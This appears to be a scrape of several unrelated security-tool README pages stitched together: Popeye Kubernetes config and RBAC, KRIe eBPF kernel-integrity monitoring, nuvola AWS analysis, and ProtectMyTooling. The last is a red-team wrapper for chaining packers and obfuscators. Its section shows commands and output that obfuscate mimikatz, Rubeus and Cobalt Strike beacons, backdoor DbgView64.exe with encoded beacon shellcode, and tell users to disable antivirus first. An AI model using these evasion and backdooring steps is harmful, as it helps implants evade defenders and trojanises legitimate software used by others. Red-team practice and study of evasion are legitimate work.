# Completely exclude horizontal pod autoscalers.
autoscaling/v1/horizontalpodautoscalers:
- name: rx:.*

# Configure node resources.
node:
# Limits set a cpu/mem threshold in % ie if cpu|mem > limit a lint warning is triggered.
limits:
# CPU checks if current CPU utilization on a node is greater than 90%.
cpu: 90
# Memory checks if current Memory utilization on a node is greater than 80%.
memory: 80

# Configure pod resources
pod:
# Restarts check the restarts count and triggers a lint warning if above threshold.
restarts:
3
# Check container resource utilization in percent.
# Issues a lint warning if above these thresholds.
limits:
cpu: 80
memory: 75

# Configure a list of allowed registries to pull images from
registries:
- quay.io
- docker.io

Popeye In Your Clusters!

Alternatively, Popeye is containerized and can be run directly in your Kubernetes clusters as a one-off or CronJob.

Here is a sample setup, please modify per your needs/wants. The manifests for this are in the k8s directory in this repo.

kubectl apply -f k8s/popeye/ns.yml && kubectl apply -f k8s/popeye
---
apiVersion: batch/v1
kind: CronJob
metadata:
name: popeye
namespace: popeye
spec:
schedule: "* */1 * * *" # Fire off Popeye once an hour
concurrencyPolicy: Forbid
jobTemplate:
spec:
template:
spec:
serviceAccountName: popeye
restartPolicy: Never
containers:
- name: popeye
image: derailed/popeye
imagePullPolicy: IfNotPresent
args:
- -o
- yaml
- --force-exit-zero
- true
resources:
limits:
cpu: 500m
memory: 100Mi

The --force-exit-zero should be set to true. Otherwise, the pods will end up in an error state. Note that popeye exits with a non-zero error code if the report has any errors.

Popeye got your RBAC!

In order for Popeye to do his work, the signed-in user must have enough RBAC oomph to get/list the resources mentioned above.

Sample Popeye RBAC Rules (please note that those are subject to change.)

---
# Popeye ServiceAccount.
apiVersion: v1
kind: ServiceAccount
metadata:
name: popeye
namespace: popeye

---
# Popeye needs get/list access on the following Kubernetes resources.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: popeye
rules:
- apiGroups: [""]
resources:
- configmaps
- deployments
- endpoints
- horizontalpodautoscalers
- namespaces
- nodes
- persistentvolumes
- persistentvolumeclaims
- pods
- secrets
- serviceaccounts
- services
- statefulsets
verbs: ["get", "list"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources:
- clusterroles
- clusterrolebindings
- roles
- rolebindings
verbs: ["get", "list"]
- apiGroups: ["metrics.k8s.io"]
resources:
- pods
- nodes
verbs: ["get", "list"]

---
# Binds Popeye to this ClusterRole.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: popeye
subjects:
- kind: ServiceAccount
name: popeye
namespace: popeye
roleRef:
kind: ClusterRole
name: popeye
apiGroup: rbac.authorization.k8s.io

Screenshots

Cluster D Score

Cluster A Score

Report Morphology

The sanitizer report outputs each resource group scanned and their potential issues. The report is color/emoji coded in terms of sanitizer severity levels:

Level Icon Jurassic Color Description
Ok βœ… OK Green Happy!
Info πŸ”Š I BlueGreen FYI
Warn W Yellow Potential Issue
Error πŸ’₯ E Red Action required

The heading section for each scanned Kubernetes resource provides a summary count for each of the categories above.

The Summary section provides a Popeye Score based on the sanitization pass on the given cluster.

Known Issues

This initial drop is brittle. Popeye will most likely blow up when…

  • You're running older versions of Kubernetes. Popeye works best with Kubernetes 1.13+.
  • You don't have enough RBAC oomph to manage your cluster (see RBAC section)

Disclaimer

This is work in progress! If there is enough interest in the Kubernetes community, we will enhance per your recommendations/contributions. Also if you dig this effort, please let us know that too!

ATTA Girls/Boys!

Popeye sits on top of many open source projects and libraries. Our sincere appreciation to all the OSS contributors who work nights and weekends to make this project a reality!

Contact Info

  1. Email: fernand@imhotep.io
  2. Twitter: @kitesurfer


KRIe - Linux Kernel Runtime Integrity With eBPF


KRIe is a research project that aims to detect Linux Kernel exploits with eBPF. KRIe is far from being a bulletproof strategy: from eBPF related limitations to post exploitation detections that might rely on a compromised kernel to emit security events, it is clear that a motivated attacker will eventually be able to bypass it. That being said, the goal of the project is to make attackers' lives harder and ultimately prevent out-of-the-box exploits from working on a vulnerable kernel.

KRIe has been developed using CO-RE (Compile Once - Run Everywhere) so that it is compatible with a large range of kernel versions. If your kernel doesn't export its BTF debug information, KRIe will try to download it automatically from BTFHub. If your kernel isn't available on BTFHub, but you have been able to manually generate your kernel's BTF data, you can provide it in the configuration file (see below).


System requirements

This project was developed on Ubuntu Focal 20.04 (Linux Kernel 5.15) and has been tested on older releases down to Ubuntu Bionic 18.04 (Linux Kernel 4.15).

  • golang 1.18+
  • (optional) Kernel headers are expected to be installed in lib/modules/$(uname -r), update the Makefile with their location otherwise.
  • (optional) clang & llvm 14.0.6+

The optional requirements are only needed to recompile the eBPF programs.

Build

  1. Since KRIe was built using CO-RE, you shouldn't need to rebuild the eBPF programs. That said, if you still want to rebuild the eBPF programs, you can use the following command:
# ~ make build-ebpf
  2. To build KRIe, run:
# ~ make build
  3. To install KRIe (copy to /usr/bin/krie), run:
# ~ make install

Getting started

KRIe needs to run as root. Run sudo krie -h to get help.

# ~ krie -h
Usage:
krie [flags]

Flags:
--config string KRIe config file (default "./cmd/krie/run/config/default_config.yaml")
-h, --help help for krie

Configuration

## Log level, options are: panic, fatal, error, warn, info, debug or trace
log_level: debug

## JSON output file, leave empty to disable JSON output.
output: "/tmp/krie.json"

## BTF information for the current kernel in .tar.xz format (required only if KRIE isn't able to locate it by itself)
vmlinux: ""

## events configuration
events:
## action taken when an init_module event is detected
init_module: log

## action taken when an delete_module event is detected
delete_module: log

## action taken when a bpf event is detected
bpf: log

## action taken when a bpf_filter event is detected
bpf_filter: log

## action taken when a ptrace event is detected
ptrace: log

## action taken when a kprobe event is detected
kprobe: log

## action taken when a sysctl event is detected
sysctl:
action: log

## Default settings for sysctl programs (kernel 5.2+ only)
sysctl_default:
block_read_access: false
block_write_access: false

## Custom settings for sysctl programs (kernel 5.2+ only)
sysctl_parameters:
kernel/yama/ptrace_scope:
block_write_access: true
kernel/ftrace_enabled:
override_input_value_with: "1\n"

## action taken when a hooked_syscall_table event is detected
hooked_syscall_table: log

## action taken when a hooked_syscall event is detected
hooked_syscall: log

## kernel_parameter event configuration
kernel_parameter:
action: log
periodic_action: log
ticker: 1 # sends at most one event every [ticker] second(s)
list:
- symbol: system/kprobes_all_disarmed
expected_value: 0
size: 4
# - symbol: system/selinux_state
# expected_value: 256
# size: 2

# sysctl
- symbol: system/ftrace_dump_on_oops
expected_value: 0
size: 4
- symbol: system/kptr_restrict
expected_value: 0
size: 4
- symbol: system/randomize_va_space
expected_value: 2
size: 4
- symbol: system/stack_tracer_enabled
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_clone
expected_value: 0
size: 4
- symbol: system/unprivileged_userns_apparmor_policy
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_bpf_disabled
expected_value: 1
size: 4
- symbol: system/ptrace_scope
expected_value: 2
size: 4
- symbol: system/sysctl_perf_event_paranoid
expected_value: 2
size: 4
- symbol: system/kexec_load_disabled
expected_value: 1
size: 4
- symbol: system/dmesg_restrict
expected_value: 1
size: 4
- symbol: system/modules_disabled
expected_value: 0
size: 4
- symbol: system/ftrace_enabled
expected_value: 1
size: 4
- symbol: system/ftrace_disabled
expected_value: 0
size: 4
- symbol: system/sysctl_protected_fifos
expected_value: 1
size: 4
- symbol: system/sysctl_protected_hardlinks
expected_value: 1
size: 4
- symbol: system/sysctl_protected_regular
expected_value: 2
size: 4
- symbol: system/sysctl_protected_symlinks
expected_value: 1
size: 4
- symbol: system/sysctl_unprivileged_userfaultfd
expected_value: 0
size: 4

## action taken when a register_check fails on a sensitive kernel space hook point
register_check: log

Documentation

License

  • The golang code is under Apache 2.0 License.
  • The eBPF programs are under the GPL v2 License.


nuvola - Tool To Dump And Perform Automatic And Manual Security Analysis On Aws Environments Configurations And Services

nuvola (with the lowercase n) is a tool to dump and perform automatic and manual security analysis on AWS environment configurations and services using predefined, extensible and custom rules created with a simple YAML syntax.

The general idea behind this project is to create an abstracted digital twin of a cloud platform. For a more concrete example: nuvola reflects the BloodHound traits used for Active Directory analysis but on cloud environments (at the moment only AWS).

The usage of a graph database also increases the possibility of finding different and innovative attack paths and can be used as an offline, centralised and lightweight digital twin.


Quick Start

Requirements

  • docker-compose installed
  • an AWS account configured to be used with awscli with full access to the cloud resources, better if in ReadOnly mode (the policy arn:aws:iam::aws:policy/ReadOnlyAccess is fine)

Setup

  1. Clone the repository
git clone --depth=1 https://github.com/primait/nuvola.git; cd nuvola
  2. Create and edit, if required, the .env file to set your DB username/password/URL
cp .env_example .env;
  3. Start the Neo4j docker instance
make start
  4. Build the tool
make build

Usage

  1. Firstly you need to dump all the supported AWS services configurations and load the data into the Neo4j database:
./nuvola dump -profile default_RO -outputdir ~/DumpDumpFolder -format zip
  2. To import a previously executed dump operation into the Neo4j database:
./nuvola assess -import ~/DumpDumpFolder/nuvola-default_RO_20220901.zip
  3. To only perform static assessments on the data loaded into the Neo4j database using the predefined ruleset:
./nuvola assess
  4. Or use Neo4j Browser to manually explore the digital twin.

About nuvola

To get started with nuvola and its database schema, check out the nuvola Wiki.

No data is sent or shared with Prima Assicurazioni.

How to contribute

  • reporting bugs and issues
  • reporting new improvements
  • reviewing issues and pull requests
  • fixing bugs and issues
  • creating new rules
  • improving the overall quality

Presentations

License

nuvola uses graph theory to reveal possible attack paths and security misconfigurations on cloud environments.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this repository and program. If not, see http://www.gnu.org/licenses/.



ProtectMyTooling - Multi-Packer Wrapper Letting Us Daisy-Chain Various Packers, Obfuscators And Other Red Team Oriented Weaponry


Script that wraps around a multitude of packers, protectors, obfuscators, shellcode loaders, encoders and generators to produce complex, protected Red Team implants. Your perfect companion in a Malware Development CI/CD pipeline, helping you watermark your artifacts, collect IOCs, backdoor and more.


ProtectMyToolingGUI.py

With ProtectMyTooling you can quickly obfuscate your binaries without having to worry about clicking through all the dialogs, interfaces and menus, creating projects to obfuscate a single binary, clicking through all the options available, and wasting time on all that nonsense. It takes you straight to the point - to obfuscate your tool.

The aim is to offer the most convenient interface possible and to allow leveraging a daisy-chain of multiple packers combined on a single binary.

That's right - we can launch ProtectMyTooling with several packers at once:

C:\> py ProtectMyTooling.py hyperion,upx mimikatz.exe mimikatz-obf.exe

The above example will first pass mimikatz.exe to Hyperion for obfuscation, and then the result will be provided to UPX for compression, resulting in UPX(Hyperion(file)).

Features

  • Supports multiple different PE Packers, .NET Obfuscators, Shellcode Loaders/Builders
  • Allows daisy-chaining packers where output from a packer is passed to the consecutive one: callobf,hyperion,upx will produce artifact UPX(Hyperion(CallObf(file)))
  • Collects IOCs at every obfuscation step so that auditing & Blue Team requests can be satisfied
  • Offers functionality to inject custom Watermarks to resulting PE artifacts - in DOS Stub, Checksum, as a standalone PE Section, to file's Overlay
  • Comes up with a handy Cobalt Strike aggressor script bringing protected-upload and protected-execute-assembly commands
  • Straightforward command line usage

Installation

This tool was designed to work on Windows, as most packers natively target that platform.

Some features may work however on Linux just fine, nonetheless that support is not fully tested, please report bugs and issues.

  1. First, disable your AV and add contrib directory to exclusions. That directory contains obfuscators, protectors which will get flagged by AV and removed.
  2. Then clone this repository
PS C:\> git clone --recurse https://github.com/Binary-Offensive/ProtectMyTooling
  3. Actual installation is straightforward:

Windows

PS C:\ProtectMyTooling> .\install.ps1

Linux

bash# ./install.sh

Gimmicks

For the ScareCrow packer to run on Windows 10, WSL needs to be installed and bash.exe available (in %PATH%). Then, in WSL, one needs to have golang installed in version at least 1.16:

cmd> bash
bash$ sudo apt update ; sudo apt upgrade -y ; sudo apt install golang=2:1.18~3 -y

Configuration

To plug-in supported obfuscators, change default options or point ProtectMyTooling to your obfuscator executable path, you will need to adjust config\ProtectMyTooling.yaml configuration file.

There is also config\sample-full-config.yaml file containing all the available options for all the supported packers, serving as reference point.

Friendly reminder

  • If your produced binary crashes or doesn't run as expected - try using different packers chain.
  • Packers don't guarantee stability of produced binaries, therefore ProtectMyTooling cannot as well.
  • While chaining, carefully match output->input payload formats according to what consecutive packer expects.

Usage

Before ProtectMyTooling's first use, it is essential to adjust the program's YAML configuration file ProtectMyTooling.yaml. The order of parameter processing is as follows:

  • Firstly default parameters are used
  • Then they're overwritten by values coming from YAML
  • Finally, whatever is provided in command line will overwrite corresponding values

There, paths and options for the supported packers must be set to enable them.

Scenario 1: Simple ConfuserEx obfuscation

Usage is very simple, all it takes is to pass the name of obfuscator to choose, input and output file paths:

C:\> py ProtectMyTooling.py confuserex Rubeus.exe Rubeus-obf.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;\''';;;;\'\''',;;;'````;;;;;;;;\'\'''
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;\'''.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88" 888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15

[.] Processing x86 file: "\Rubeus.exe"
[.] Generating output of ConfuserEx(<file>)...

[+] SUCCEEDED. Original file size: 417280 bytes, new file size ConfuserEx(<file>): 756224, ratio: 181.23%

Scenario 2: Simple ConfuserEx obfuscation followed by artifact test

One can also obfuscate the file and immediately attempt to launch it (also with supplied optional parameters) to ensure it runs fine with options -r --cmdline CMDLINE:

Scenario 3: Complex malware obfuscation with watermarking and IOCs collection

Below use case takes beacon.exe on input and feeds it consecutively into CallObf -> UPX -> Hyperion packers.

Then it will inject specified fooobar watermark to the final generated output artifact's DOS Stub as well as modify that artifact's checksum with value 0xAABBCCDD.

Finally, ProtectMyTooling will capture all IOCs (md5, sha1, sha256, imphash, and other metadata) and save them in auxiliary CSV file. That file can be used for IOC matching as engagement unfolds.

PS> py .\ProtectMyTooling.py callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd

[...]

[.] Processing x64 file: "beacon.exe"
[>] Generating output of CallObf(<file>)...

[.] Before obfuscation file's PE IMPHASH: 17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH: 378d9692fe91eb54206e98c224a25f43
[>] Generating output of UPX(CallObf(<file>))...

[>] Generating output of Hyperion(UPX(CallObf(<file>)))...

[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Successfully watermarked resulting artifact file.
[+] IOCs written to: beacon-obf-ioc.csv

[+] SUCCEEDED. Original file size: 288256 bytes, new file size Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%

Produced IOCs evidence CSV file will look as follows:

timestamp,filename,author,context,comment,md5,sha1,sha256,imphash
2022-06-10 03:15:52,beacon.exe,mgeeky@commandoVM,Input File,test,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,mgeeky@commandoVM,Obfuscation artifact: CallObf(<file>),test,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,mgeeky@commandoVM,Obfuscation artifact: UPX(CallObf(<file>)),test,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),test,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Output obfuscated artifact,test,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d

Supported Packers

ProtectMyTooling was designed to support not only obfuscators/packers but also all sorts of builders/generators/shellcode loaders usable from the command line.

At the moment, the program supports various commercial and open-source packers/obfuscators. The open-source ones are bundled within the project. Commercial ones require the user to purchase the product and configure its location in the ProtectMyTooling.yaml file so the script knows where to find them.

  1. Amber - Reflective PE Packer that takes EXE/DLL on input and produces EXE/PIC shellcode
  2. AsStrongAsFuck - A console obfuscator for .NET assemblies by Charterino
  3. CallObfuscator - Obfuscates specific windows apis with different apis.
  4. ConfuserEx - Popular .NET obfuscator, the fork maintained by Martin Karing (mkaring)
  5. Donut - Popular PE loader that takes EXE/DLL/.NET on input and produces a PIC shellcode
  6. Enigma - A powerful system designed for comprehensive protection of executable files
  7. Hyperion - Runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation based on the paper "Hyperion: Implementation of a PE-Crypter"
  8. IntelliLock - combines strong license security, highly adaptable licensing functionality/schema with reliable assembly protection
  9. InvObf - Obfuscates PowerShell scripts with Invoke-Obfuscation (by Daniel Bohannon)
  10. LoGiC.NET - A more advanced free and open .NET obfuscator using dnlib by AnErrupTion
  11. Mangle - Takes input EXE/DLL file and produces output one with cloned certificate, removed Golang-specific IoCs and bloated size. By Matt Eidelberg (@Tyl0us).
  12. MPRESS - MPRESS compressor by Vitaly Evseenko. Takes input EXE/DLL/.NET/MAC-DARWIN (x86/x64) and compresses it.
  13. NetReactor - Unmatched .NET code protection system which completely stops anyone from decompiling your code
  14. NetShrink - an exe packer aka executable compressor, application password protector and virtual DLL binder for Windows & Linux .NET applications.
  15. Nimcrypt2 - Generates Nim loader running input .NET, PE or Raw Shellcode. Authored by (@icyguider)
  16. NimPackt-v1 - Takes Shellcode or .NET Executable on input, produces EXE or DLL loader. Brought to you by Cas van Cooten (@chvancooten)
  17. NimSyscallPacker - Takes PE/Shellcode/.NET executable and generates robust Nim+Syscalls EXE/DLL loader. Sponsorware authored by (@S3cur3Th1sSh1t)
  18. Packer64 - wrapper around John Adams' Packer64
  19. pe2shc - Converts PE into a shellcode. By yours truly @hasherezade
  20. peCloak - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool
  21. peresed - Uses "peresed" from avast/pe_tools to remove all existing PE Resources and signature (think of Mimikatz icon).
  22. ScareCrow - EDR-evasive x64 shellcode loader that produces DLL/CPL/XLL/JScript/HTA artifact loader
  23. sgn - Shikata ga nai (δ»•ζ–ΉγŒγͺい) encoder ported into go with several improvements. Takes shellcode, produces encoded shellcode
  24. SmartAssembly - obfuscator that helps protect your application against reverse-engineering or modification, by making it difficult for a third-party to access your source code
  25. sRDI - Convert DLLs to position independent shellcode. Authored by: Nick Landers, @monoxgas
  26. Themida - Advanced Windows software protection system
  27. UPX - a free, portable, extendable, high-performance executable packer for several executable formats.
  28. VMProtect - protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the software

You can quickly list supported packers using the -L option (table columns are chosen depending on terminal width; the wider the terminal, the more information is revealed):

C:\> py ProtectMyTooling.py -L
[...]

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15

+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| # | Name | Licensing | Type | Input | Output | Author |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| 1 | amber | open-source | Shellcode Loader | PE | EXE, Shellcode | Ege Balci |
| 2 | asstrongasfuck | open-source | .NET Obfuscator | .NET | .NET | Charterino, klezVirus |
| 3 | backdoor | open-source | Shellcode Loader | Shellcode | PE | Mariusz Banach, @mariuszbit |
| 4 | callobf | open-source | PE EXE/DLL Protector | PE | PE | Mustafa Mahmoud, @d35ha |
| 5 | confuserex | open-source | .NET Obfuscator | .NET | .NET | mkaring |
| 6 | donut-packer | open-source | Shellcode Converter | PE, .NET, VBScript, JScript | Shellcode | TheWover |
| 7 | enigma | commercial | PE EXE/DLL Protector | PE | PE | The Enigma Protector Developers Team |
| 8 | hyperion | open-source | PE EXE/DLL Protector | PE | PE | nullsecurity team |
| 9 | intellilock | commercial | .NET Obfuscator | PE | PE | Eziriz |
| 10 | invobf | open-source | Powershell Obfuscator | Powershell | Powershell | Daniel Bohannon |
| 11 | logicnet | open-source | .NET Obfuscator | .NET | .NET | AnErrupTion, klezVirus |
| 12 | mangle | open-source | Executable Signing | PE | PE | Matt Eidelberg (@Tyl0us) |
| 13 | mpress | freeware | PE EXE/DLL Compressor | PE | PE | Vitaly Evseenko |
| 14 | netreactor | commercial | .NET Obfuscator | .NET | .NET | Eziriz |
| 15 | netshrink | open-source | .NET Obfuscator | .NET | .NET | Bartosz WΓ³jcik |
| 16 | nimcrypt2 | open-source | Shellcode Loader | PE, .NET, Shellcode | PE | @icyguider |
| 17 | nimpackt | open-source | Shellcode Loader | .NET, Shellcode | PE | Cas van Cooten (@chvancooten) |
| 18 | nimsyscall | sponsorware | Shellcode Loader | PE, .NET, Shellcode | PE | @S3cur3Th1sSh1t |
| 19 | packer64 | open-source | PE EXE/DLL Compressor | PE | PE | John Adams, @jadams |
| 20 | pe2shc | open-source | Shellcode Converter | PE | Shellcode | @hasherezade |
| 21 | pecloak | open-source | PE EXE/DLL Protector | PE | PE | Mike Czumak, @SecuritySift, buherator / v-p-b |
| 22 | peresed | open-source | PE EXE/DLL Protector | PE | PE | Martin VejnΓ‘r, Avast |
| 23 | scarecrow | open-source | Shellcode Loader | Shellcode | DLL, JScript, CPL, XLL | Matt Eidelberg (@Tyl0us) |
| 24 | sgn | open-source | Shellcode Encoder | Shellcode | Shellcode | Ege Balci |
| 25 | smartassembly | commercial | .NET Obfuscator | .NET | .NET | Red-Gate |
| 26 | srdi | open-source | Shellcode Encoder | DLL | Shellcode | Nick Landers, @monoxgas |
| 27 | themida | commercial | PE EXE/DLL Protector | PE | PE | Oreans |
| 28 | upx | open-source | PE EXE/DLL Compressor | PE | PE | Markus F.X.J. Oberhumer, LΓ‘szlΓ³ MolnΓ‘r, John F. Reiser |
| 29 | vmprotect | commercial | PE EXE/DLL Protector | PE | PE | vmpsoft |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+

Above are the packers that are supported, but that doesn't mean you have them configured and ready to use. To prepare them for use, you must first supply the necessary binaries in the contrib directory and then configure your YAML file accordingly.

RedWatermarker - built-in Artifact watermarking

Artifact watermarking & IOC collection

This program is intended for professional Red Teams and fits well into a typical implant-development CI/CD pipeline. As a red teamer I'm expected to deliver a decent-quality list of IOCs matching back to all of my implants, and I find it essential to watermark all my implants for bookkeeping, attribution and traceability purposes.

To accommodate these requirements, ProtectMyTooling brings basic support for them.

Artifact Watermarking

ProtectMyTooling can apply watermarks after obfuscation rounds simply by using the --watermark option:

py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w section=.coco,ALLYOURBASEAREBELONG

There is also a standalone approach, included in RedWatermarker.py script.

It takes an executable artifact as input and accepts a few parameters denoting where to inject the watermark and what value to insert.

The example run below sets the PE checksum to 0xAABBCCDD, inserts foooobar into the PE file's DOS stub (the bytes containing This program cannot be run...), appends bazbazbaz to the file's overlay, and then creates a new PE section named .coco, appends it to the end of the file and fills that section with the preset marker.

py RedWatermarker.py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG

Full watermarker usage:

cmd> py RedWatermarker.py --help

;
ED.
,E#Wi
j. f#iE###G.
EW, .E#t E#fD#W;
E##j i#W, E#t t##L
E###D. L#D. E#t .E#K,
E#jG#W; :K#Wfff; E#t j##f
E#t t##f i##WLLLLtE#t :E#K:
E#t :K#E: .E#L E#t t##L
E#KDDDD###i f#E: E#t .D#W; ,; G: ,;
E#f,t#Wi,,, ,WW; E#tiW#G. f#i j. j. E#, : f#i j.
E#t ;#W: ; .D#;E#K##i .. GEEEEEEEL .E#t EW, .. : .. EW, E#t .GE .E#t EW,
DWi ,K.DL ttE##D. ;W, ,;;L#K;;. i#W, E##j ,W, .Et ;W, E##j E#t j#K; i#W, E##j
f. :K#L LWL E#t j##, t#E L#D. E###D. t##, ,W#t j##, E###D. E#GK#f L#D. E###D.
EW: ;W##L .E#f L: G###, t#E :K#Wfff; E#jG#W; L###, j###t G###, E#jG#W; E##D. :K#Wfff; E#jG#W;
E#t t#KE#L ,W#; :E####, t#E i##WLLLLt E#t t##f .E#j##, G#fE#t :E####, E#t t##f E##Wi i##WLLLLt E#t t##f
E#t f#D.L#L t#K: ;W#DG##, t#E .E#L E#t :K#E: ;WW; ##,:K#i E#t ;W#DG##, E#t :K#E:E#jL#D: .E#L E#t :K#E:
E#jG#f L#LL#G j###DW##, t#E f#E: E#KDDDD###i j#E. ##f#W, E#t j###DW##, E#KDDDD###E#t ,K#j f#E: E#KDDDD###i
E###; L###j G##i,,G##, t#E ,WW; E#f,t#Wi,,,.D#L ###K: E#t G##i,,G##, E#f,t#Wi,,E#t jD ,WW; E#f,t#Wi,,,
E#K: L#W; :K#K: L##, t#E .D#; E#t ;#W: :K#t ##D. E#t :K#K: L##, E#t ;#W: j#t .D#; E#t ;#W:
EG LE. ;##D. L##, fE tt DWi ,KK:... #G .. ;##D. L##, DWi ,KK: ,; tt DWi ,KK:
; ;@ ,,, .,, : j ,,, .,,


Watermark thy implants, track them in VirusTotal
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>

usage: RedWatermarker.py [options] <infile>

options:
-h, --help show this help message and exit

Required arguments:
infile Input implant file

Optional arguments:
-C, --check Do not actually inject watermark. Check input file if it contains specified watermarks.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.

PE Executables Watermarking:
-t STR, --dos-stub STR
Insert watermark into PE DOS Stub (This program cannot be run...).
-c NUM, --checksum NUM
Preset PE checksum with this value (4 bytes). Must be number. Can start with 0x for hex value.
-e STR, --overlay STR
Append watermark to the file's Overlay (at the end of the file).
-s NAME,STR, --section NAME,STR
Append a new PE section named NAME and insert watermark there. Section name must be shorter than 8 characters. Section will be marked Read-Only, non-executable.

Currently only PE file watermarking is supported, but in the future Office documents and other formats are to be added as well.

IOCs Collection

IOCs may be collected by simply using the -i option when running ProtectMyTooling.

They are collected at the following phases:

  • on the input file
  • after each obfuscation round on an intermediary file
  • on the final output file

They contain the following fields, saved in the form of a CSV file:

  • timestamp
  • filename
  • author - formed as username@hostname
  • context - whether a record points to an input, output or intermediary file
  • comment - value adjusted by the user through -I value option
  • md5
  • sha1
  • sha256
  • imphash - PE Imports Hash, if available
  • (TODO) typeref_hash - .NET TypeRef Hash, if available

The result is a CSV file named outfile-ioc.csv stored alongside the generated output artifact. That file is written in append mode, meaning it will accumulate IOCs from subsequent runs.

RedBackdoorer - built-in PE Backdooring

ProtectMyTooling utilizes my own RedBackdoorer.py script, which provides a few methods for backdooring PE executables. Support comes as a dedicated packer named backdoor. Example usage:

The example takes Cobalt Strike shellcode as input, encodes it with SGN (Shikata Ga Nai), backdoors SysInternals DbgView64.exe with it, and then produces an Amber EXE reflective loader:

PS> py ProtectMyTooling.py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88"888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
